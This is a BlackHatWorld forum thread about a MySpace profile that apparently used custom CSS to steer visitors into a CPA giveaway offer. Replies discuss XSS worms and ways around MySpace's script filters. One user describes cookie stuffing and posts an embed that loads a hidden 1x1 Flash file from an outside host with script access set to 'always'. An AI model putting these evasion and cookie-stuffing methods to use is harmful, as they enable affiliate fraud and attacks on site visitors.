Found this going through myspace

C

CyrusVirus

BANNED
Joined
Aug 20, 2009
Messages
1,109
Reaction score
693
ok guys, so i got a friend request from a ... chick i guess, went to her profile and found something odd.

here is the url, i am only putting this on here so you can study it and figure out how they did it. maybe you guys can figure it out,
i think this is a cpa thing, can't be an ewhore thing because it doesnt lead to anything like that.
so, to the mods, please delete this if it is inappropriate, or if you think that it is not right.

HTML: 
http://www.myspace.com/506289604
This is only for others to maybe study it and get a few ideas on how to do this.
i tried ever code i can think of with myspace, and this just blew my mind.

EDIt: this is not mine
 
Advertise on BHW
Wow, thats the LAST thing I expected to see!

I wonder how they are monetizing this?

Interesting...
 
Theres a macbook air email submit at the end.. probably a rotator for various computer offers. They pre-qualify the lead by telling them its a Dell giveaway.. so they want a computer, enter my email? ok.. lemme get it.. boom paid. The end. But yeah idk how 'modules' and uploading your own css works with myspace.. maybe the old comedian profile trick?

Save the page as complete and look at the basebundle_utqnbzen.css file and what .autoresize is doing.. thats where the magic happens.

Good luck
 
hmm good idea, i think ill get working on something like this, because whoever did this, is gonna make some good money.
ifwearner said:
Theres a macbook air email submit at the end.. probably a rotator for various computer offers. They pre-qualify the lead by telling them its a Dell giveaway.. so they want a computer, enter my email? ok.. lemme get it.. boom paid. The end. But yeah idk how 'modules' and uploading your own css works with myspace.. maybe the old comedian profile trick?

Save the page as complete and look at the basebundle_utqnbzen.css file and what .autoresize is doing.. thats where the magic happens.

Good luck
Click to expand...
 
aww the profile was taken down I think.. I know even crazier things are possible with myspace. There's things such as xss worms(they have fixed most of the ways to do these) look up samy myspace on google for more info on that.
I will give you all a hint to doing basically whatever you want to on myspace tho. They allow flash. Flash can call websites outside of the one its on. You use the flash to call javascript, visual basic script, or php that calls other things. There is quite a bit of possibilities. Allowing any external code can be a security threat if you know how to use it.
 
Whatever it was, MySpace didn't like it:

This user has either cancelled their membership, or their account has been deleted.
 
mpruben said:
Whatever it was, MySpace didn't like it:

This user has either cancelled their membership, or their account has been deleted.
Click to expand...

This always happens... This time, it was fast!

buah haha hahaha!
 
I pretty much gave it away in my post if you are willing to learn it, but I will not share on here because many of the methods that can be used are illegal.
 
tentyler said:
aww the profile was taken down I think.. I know even crazier things are possible with myspace. There's things such as xss worms(they have fixed most of the ways to do these) look up samy myspace on google for more info on that.
I will give you all a hint to doing basically whatever you want to on myspace tho. They allow flash. Flash can call websites outside of the one its on. You use the flash to call javascript, visual basic script, or php that calls other things. There is quite a bit of possibilities. Allowing any external code can be a security threat if you know how to use it.
Click to expand...

I believe myspace has fixed that as all objects now are turned off by default. "allowScriptAccess=never"
 
Oops,

Invalid Friend ID.
This user has either cancelled their membership, or their account has been deleted.


Anyone got a screenshot of the profile? I would like to get an idea of what you guys are talking?
 
Maybe it's not such a good idea to implememnt this afterall since myspace took it down with the quickness. :(
 
Well, I wouldn't spend much time analyzing or lamenting this particular method if Myspace dropped the hammer on it so quickly. Probably a good idea but needs more CYA...
 
I believe myspace has fixed that as all objects now are turned off by default. "allowScriptAccess=never"
Click to expand...

My c00kie stuffing on myspace goes to a remote page. That allow script access thing can be gotten around pretty easily. It is also possible to do it with images. You have to be creative with your coding to get around their filters though, but it is possible. I'm not sure if I'm allowed to make a guide on how to do it on this forum, but maybe I'll make one and post it up in vip.

Myspace has by default for flash apps that are embedded 'allowscriptaccess=false' embedded with it...so you cant execute JS directly on the page. You can get around this by using flash to call php which calls java though. I'm not saying its easy because you have to make the code a certain way to escape their filters, but it is possible. Also most of their limits apply to embed tags you can use flash objects fine. An example that is currently working for me is

PHP: 
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="1" height="1" id="movie" align="">
<param name=FlashVars value="cid=11&id=0">
<param name="movie" value="http://mywebsite.com/files/11.swf">
<param name="bgcolor" value="#ffffff">
<param name="allowScriptAccess" value="always" />
<embed allowScriptAccess="always" FlashVars="cid=11&id=0" src="http://mywebsite.com/files/11.swf" quality="high" bgcolor="#ffffff" width="1" height="1" name="movie" align="" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed>
</object>

I have had no problems from myspace running this, but it also doesn't make a huge ad on my page lol.
 
Advertise on BHW
You must log in or register to reply here.
Sign up now!

Main Menu

Home Main Forum List Black Hat SEO White Hat SEO BHW Newbie Guide Blogging Black Hat Tools Social Networking Downloads

Marketplace

Account Selling Content / Copywriting Hosting Images, Logos & Videos Proxies For Sale SEO - Link building SEO - Packages Social Media Social Media - Panels Misc

Making Money

Affiliate Programs Hire a Freelancer Making Money Pay Per Click Site Flipping

BlackHatWorld

BHW Merch Forum Suggestions & Feedback Introductions Lounge Dispute Resolution

Other

Domain Name Forum IM Journeys Web Hosting Newsletter
Back
Top